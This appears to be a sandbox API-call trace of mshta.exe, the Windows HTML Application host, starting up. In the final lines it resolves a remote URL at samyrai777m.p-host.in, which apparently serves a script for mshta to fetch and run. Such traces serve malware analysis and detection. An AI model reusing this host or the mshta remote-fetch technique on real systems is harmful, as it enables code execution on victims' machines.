[0067.527] GetModuleBaseNameW (in: hProcess=0xffffffffffffffff, hModule=0x0, lpBaseName=0x20e240, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9
[0067.527] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0067.527] FindAtomW (lpString="TridentEnableHiRes") returned 0x0
[0067.527] SHGetValueW (in: hkey=0xffffffff80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x20e238, pvData=0x20e234, pcbData=0x20e230*=0x4 | out: pdwType=0x20e238*=0x0, pvData=0x20e234, pcbData=0x20e230*=0x4) returned 0x2
[0067.527] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20e128 | out: phkResult=0x20e128*=0x1cc) returned 0x0
[0067.528] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20e130 | out: phkResult=0x20e130*=0x1c8) returned 0x0
[0067.528] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x20e0b8 | out: phkResult=0x20e0b8*=0x0) returned 0x2
[0067.528] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x20e0b8 | out: phkResult=0x20e0b8*=0x0) returned 0x2
[0067.528] RegCloseKey (hKey=0x0) returned 0x6
[0067.528] RegCloseKey (hKey=0x0) returned 0x6
[0067.528] RegCloseKey (hKey=0x1cc) returned 0x0
[0067.528] RegCloseKey (hKey=0x1c8) returned 0x0
[0067.528] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0067.528] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0067.528] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0067.528] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788
[0067.528] GetCurrentThreadId () returned 0x628
[0067.528] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc198
[0067.528] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1
[0067.529] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7fee10448f8, dwReserved=0x0 | out: ppSM=0x7fee10448f8*=0x28ed90) returned 0x0
[0067.532] GetCurrentThreadId () returned 0x628
[0067.532] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x20e4c0 | out: ppURI=0x20e4c0*=0x27d5a0) returned 0x0
[0067.532] IUri:GetPropertyDWORD (in: This=0x27d5a0, uriProp=0x11, pdwProperty=0x20e4b8, dwFlags=0x0 | out: pdwProperty=0x20e4b8*=0x11) returned 0x0
[0067.532] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x28e1a8, dwReserved=0x0 | out: ppSM=0x28e1a8*=0x2912c0) returned 0x0
[0067.532] IInternetSecurityManager:SetSecuritySite (This=0x2912c0, pSite=0x28e1b8) returned 0x0
[0067.532] IUnknown:AddRef (This=0x28e1b8) returned 0x28
[0067.532] IUnknown:QueryInterface (in: This=0x28e1b8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x20e410 | out: ppvObject=0x20e410*=0x28e1c0) returned 0x0
[0067.532] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x291308 | out: ppvObject=0x291308*=0x0) returned 0x80004002
[0067.532] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x291300 | out: ppvObject=0x291300*=0x0) returned 0x80004002
[0067.532] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2912f8 | out: ppvObject=0x2912f8*=0x0) returned 0x80004002
[0067.532] IUnknown:Release (This=0x28e1c0) returned 0x0
[0067.532] IInternetSecurityManager:GetSecurityId (in: This=0x2912c0, pwszUrl="about:blank", pbSecurityId=0x20e570, pcbSecurityId=0x20e560*=0x200, dwReserved=0x0 | out: pbSecurityId=0x20e570*=0x61, pcbSecurityId=0x20e560*=0xf) returned 0x0
[0067.540] DllGetClassObject (in: rclsid=0x289c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x20d5f0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20c8f0 | out: ppv=0x20c8f0*=0x7fee1044fa0) returned 0x0
[0067.540] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0067.540] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0067.540] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x20d870 | out: ppvObject=0x20d870*=0x7fee1044fa0) returned 0x0
[0067.540] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0067.540] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x20dda0 | out: ppvObject=0x20dda0*=0x7fee1044fb8) returned 0x0
[0067.540] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0067.540] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0067.540] DllGetClassObject (in: rclsid=0x289c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20db60 | out: ppv=0x20db60*=0x7fee1044fa0) returned 0x0
[0067.540] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x20dda0 | out: ppvObject=0x20dda0*=0x7fee1044fb8) returned 0x0
[0067.541] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0067.541] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x28ccc0, cchResult=0xc, pcchResult=0x20de08, dwReserved=0x0 | out: pwzResult="", pcchResult=0x20de08*=0x0) returned 0x800c0011
[0067.541] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0067.541] IUnknown:Release (This=0x27d5a0) returned 0x2
[0067.541] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x20e520, dwReserved=0x0 | out: ppSM=0x20e520*=0x294e70) returned 0x0
[0067.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20e668 | out: phkResult=0x20e668*=0x20c) returned 0x0
[0067.541] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20e670 | out: phkResult=0x20e670*=0x210) returned 0x0
[0067.541] RegOpenKeyExW (in: hKey=0x210, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x20e5f8 | out: phkResult=0x20e5f8*=0x0) returned 0x2
[0067.541] RegOpenKeyExW (in: hKey=0x20c, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x20e5f8 | out: phkResult=0x20e5f8*=0x0) returned 0x2
[0067.541] RegCloseKey (hKey=0x0) returned 0x6
[0067.542] RegCloseKey (hKey=0x0) returned 0x6
[0067.542] RegCloseKey (hKey=0x20c) returned 0x0
[0067.542] RegCloseKey (hKey=0x210) returned 0x0
[0067.542] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x20e320 | out: ppURI=0x20e320*=0x27d5a0) returned 0x0
[0067.542] DllGetClassObject (in: rclsid=0x289c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20d920 | out: ppv=0x20d920*=0x7fee1044fa0) returned 0x0
[0067.542] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x20db60 | out: ppvObject=0x20db60*=0x7fee1044fb8) returned 0x0
[0067.542] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0067.543] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x28cda0, cchResult=0xc, pcchResult=0x20dba0, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x20dba0*=0xc) returned 0x0
[0067.543] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0067.543] DllGetClassObject (in: rclsid=0x289c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20d920 | out: ppv=0x20d920*=0x7fee1044fa0) returned 0x0
[0067.543] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x20db60 | out: ppvObject=0x20db60*=0x7fee1044fb8) returned 0x0
[0067.543] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0067.543] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x28cda0, cchResult=0xc, pcchResult=0x20dba4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x20dba4*=0x0) returned 0x800c0011
[0067.543] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0067.543] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.543] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.543] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.543] IUnknown:Release (This=0x27d5a0) returned 0x2
[0067.543] GetDC (hWnd=0x0) returned 0x530107fa
[0067.543] GetDeviceCaps (hdc=0x530107fa, index=88) returned 96
[0067.543] ReleaseDC (hWnd=0x0, hDC=0x530107fa) returned 1
[0067.543] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000
[0067.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20e758 | out: phkResult=0x20e758*=0x104) returned 0x0
[0067.544] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20e760 | out: phkResult=0x20e760*=0x20c) returned 0x0
[0067.544] RegOpenKeyExW (in: hKey=0x20c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x20e6e8 | out: phkResult=0x20e6e8*=0x0) returned 0x2
[0067.544] RegOpenKeyExW (in: hKey=0x104, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x20e6e8 | out: phkResult=0x20e6e8*=0x0) returned 0x2
[0067.544] RegCloseKey (hKey=0x0) returned 0x6
[0067.544] RegCloseKey (hKey=0x0) returned 0x6
[0067.544] RegCloseKey (hKey=0x104) returned 0x0
[0067.544] RegCloseKey (hKey=0x20c) returned 0x0
[0067.544] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000
[0067.544] GetProcAddress (hModule=0x776e0000, lpProcName="InitializeSRWLock") returned 0x778384f0
[0067.544] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockExclusive") returned 0x77828020
[0067.544] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockShared") returned 0x778254e0
[0067.544] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockExclusive") returned 0x77828050
[0067.545] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockShared") returned 0x778254b0
[0067.545] RtlInitializeConditionVariable () returned 0x778254b0
[0067.545] IUnknown_QueryService (in: punk=0x7fee10426d8, guidService=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x28d828 | out: ppvOut=0x28d828*=0x0) returned 0x80004005
[0067.545] IUnknown:QueryInterface (in: This=0x7fee10426d8, riid=0x7fefe7c08e0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x20fae0 | out: ppvObject=0x20fae0*=0x7fee1042700) returned 0x0
[0067.545] IServiceProvider:QueryService (in: This=0x7fee1042700, guidService=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x28d828 | out: ppvObject=0x28d828*=0x0) returned 0x80004005
[0067.545] IUnknown:Release (This=0x7fee1042700) returned 0x1
[0067.545] IInternetSecurityManager:SetSecuritySite (This=0x2912c0, pSite=0x28e1b8) returned 0x0
[0067.545] IUnknown:Release (This=0x28e1b8) returned 0x0
[0067.545] IUnknown:AddRef (This=0x28e1b8) returned 0x28
[0067.545] IUnknown:QueryInterface (in: This=0x28e1b8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x20fb60 | out: ppvObject=0x20fb60*=0x28e1c0) returned 0x0
[0067.546] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x291308 | out: ppvObject=0x291308*=0x0) returned 0x80004002
[0067.546] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x291300 | out: ppvObject=0x291300*=0x0) returned 0x80004002
[0067.546] IServiceProvider:QueryService (in: This=0x28e1c0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2912f8 | out: ppvObject=0x2912f8*=0x7fee1042708) returned 0x0
[0067.546] IUnknown:Release (This=0x28e1c0) returned 0x0
[0067.546] CoTaskMemAlloc (cb=0x6d) returned 0x265340
[0067.546] CoTaskMemAlloc (cb=0x9) returned 0x28cde0
[0067.546] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0
[0067.547] IsCharSpaceW (wch=0x48) returned 0
[0067.547] IsCharAlphaNumericW (ch=0x5c) returned 0
[0067.547] IsCharSpaceW (wch=0x5c) returned 0
[0067.547] IsCharSpaceW (wch=0x41) returned 0
[0067.547] IsCharAlphaNumericW (ch=0x20) returned 0
[0067.547] IsCharSpaceW (wch=0x20) returned 1
[0067.547] IsCharSpaceW (wch=0x7b) returned 0
[0067.548] IsCharSpaceW (wch=0x20) returned 1
[0067.548] IsCharAlphaNumericW (ch=0x7b) returned 0
[0067.548] IsCharSpaceW (wch=0x62) returned 0
[0067.548] IsCharAlphaNumericW (ch=0x3a) returned 0
[0067.548] IsCharSpaceW (wch=0x3a) returned 0
[0067.548] IsCharAlphaNumericW (ch=0x3a) returned 0
[0067.548] IsCharSpaceW (wch=0x75) returned 0
[0067.548] IsCharAlphaNumericW (ch=0x28) returned 0
[0067.548] IsCharSpaceW (wch=0x28) returned 0
[0067.548] IsCharAlphaNumericW (ch=0x28) returned 0
[0067.548] IsCharSpaceW (wch=0x23) returned 0
[0067.548] IsCharSpaceW (wch=0x23) returned 0
[0067.548] IsCharSpaceW (wch=0x7d) returned 0
[0067.548] IsCharAlphaNumericW (ch=0x7d) returned 0
[0067.548] IsCharSpaceW (wch=0x29) returned 0
[0067.549] IsCharSpaceW (wch=0x75) returned 0
[0067.549] IsCharSpaceW (wch=0x75) returned 0
[0067.549] IsCharSpaceW (wch=0x29) returned 0
[0067.549] CoTaskMemFree (pv=0x265340)
[0067.549] CoTaskMemFree (pv=0x28cde0)
[0067.549] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x7fefde70000
[0067.549] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x6) returned 0x7fefde71320
[0067.549] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14
[0067.549] IsOS (dwOS=0x25) returned 1
[0067.549] GetSysColor (nIndex=26) returned 0xcc6600
[0067.549] IsOS (dwOS=0x25) returned 1
[0067.549] GetSysColor (nIndex=5) returned 0xffffff
[0067.549] GetSysColor (nIndex=8) returned 0x0
[0067.594] wcstol (in: _String="0,0,255", _EndPtr=0x20e6b0, _Radix=10 | out: _EndPtr=0x20e6b0*=",0,255") returned 0
[0067.594] wcstol (in: _String="0,255", _EndPtr=0x20e6b0, _Radix=10 | out: _EndPtr=0x20e6b0*=",255") returned 0
[0067.594] wcstol (in: _String="255", _EndPtr=0x20e6b0, _Radix=10 | out: _EndPtr=0x20e6b0*="") returned 255
[0067.594] wcstol (in: _String="128,0,128", _EndPtr=0x20e6b0, _Radix=10 | out: _EndPtr=0x20e6b0*=",0,128") returned 128
[0067.594] wcstol (in: _String="0,128", _EndPtr=0x20e6b0, _Radix=10 | out: _EndPtr=0x20e6b0*=",128") returned 0
[0067.594] wcstol (in: _String="128", _EndPtr=0x20e6b0, _Radix=10 | out: _EndPtr=0x20e6b0*="") returned 128
[0067.595] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0
[0067.595] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0
[0067.595] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7b8 | out: phkResult=0x20f7b8*=0x8c) returned 0x0
[0067.595] SHGetValueW (in: hkey=0x8c, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x20f7c0, pcbData=0x20f7b0*=0xa | out: pdwType=0x0, pvData=0x20f7c0, pcbData=0x20f7b0*=0xa) returned 0x2
[0067.595] RegCloseKey (hKey=0x8c) returned 0x0
[0067.597] GetAcceptLanguagesW () returned 0x0
[0067.597] GetClassNameW (in: hWnd=0x1021a, lpClassName=0x20fb30, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0067.597] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0067.597] GetParent (hWnd=0x1021a) returned 0x10216
[0067.597] GetClassNameW (in: hWnd=0x10216, lpClassName=0x20fb30, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0067.597] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0067.597] GetParent (hWnd=0x10216) returned 0x0
[0067.598] IMoniker:GetDisplayName (in: This=0x265140, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x20fc48 | out: ppszDisplayName=0x20fc48*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0067.598] IUnknown:QueryInterface (in: This=0x265140, riid=0x7fee0f20578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x20fab0 | out: ppvObject=0x20fab0*=0x265158) returned 0x0
[0067.598] IUriContainer:GetIUri (in: This=0x265158, ppIUri=0x20fb00 | out: ppIUri=0x20fb00*=0x27e180) returned 0x0
[0067.598] IUnknown:Release (This=0x265158) returned 0x1
[0067.598] IUnknown:AddRef (This=0x265140) returned 0x2
[0067.598] IUnknown:AddRef (This=0x27e180) returned 0x5
[0067.598] IMoniker:GetDisplayName (in: This=0x265140, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x20f8b0 | out: ppszDisplayName=0x20f8b0*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0067.598] UrlGetLocationW (psz1="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0067.599] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppmk=0x20f840*=0x0, dwFlags=0x1 | out: ppmk=0x20f840*=0x265340) returned 0x0
[0067.599] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x20f820 | out: ppURI=0x20f820*=0x27e180) returned 0x0
[0067.599] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20f760 | out: pdwScheme=0x20f760*=0x2) returned 0x0
[0067.599] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1
[0067.599] IUnknown:AddRef (This=0x27e180) returned 0x9
[0067.599] IUri:GetAbsoluteUri (in: This=0x27e180, pbstrAbsoluteUri=0x28f2a0 | out: pbstrAbsoluteUri=0x28f2a0*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0067.599] IUnknown:Release (This=0x27e180) returned 0x8
[0067.599] IUnknown:AddRef (This=0x265340) returned 0x2
[0067.599] IUnknown:Release (This=0x265340) returned 0x1
[0067.599] IUnknown:AddRef (This=0x265140) returned 0x3
[0067.599] IUnknown:Release (This=0x265340) returned 0x0
[0067.599] IUnknown:AddRef (This=0x265140) returned 0x4
[0067.599] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20f480 | out: ppvObject=0x20f480*=0x27e180) returned 0x0
[0067.599] IUnknown:Release (This=0x27e180) returned 0x6
[0067.599] IUnknown:AddRef (This=0x27e180) returned 0x7
[0067.599] IUnknown:QueryInterface (in: This=0x265140, riid=0x7fee0f20578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x20f420 | out: ppvObject=0x20f420*=0x265158) returned 0x0
[0067.599] IUriContainer:GetIUri (in: This=0x265158, ppIUri=0x20f4c0 | out: ppIUri=0x20f4c0*=0x27e180) returned 0x0
[0067.599] IUnknown:Release (This=0x265158) returned 0x4
[0067.599] IUnknown:AddRef (This=0x265140) returned 0x5
[0067.599] IUnknown:Release (This=0x265140) returned 0x4
[0067.599] IUnknown:AddRef (This=0x27e180) returned 0x9
[0067.599] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20f480 | out: ppvObject=0x20f480*=0x27e180) returned 0x0
[0067.599] IUnknown:Release (This=0x27e180) returned 0x9
[0067.600] IUnknown:AddRef (This=0x27e180) returned 0xa
[0067.600] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20f480 | out: pdwScheme=0x20f480*=0x2) returned 0x0
[0067.600] GetCurrentProcessId () returned 0x370
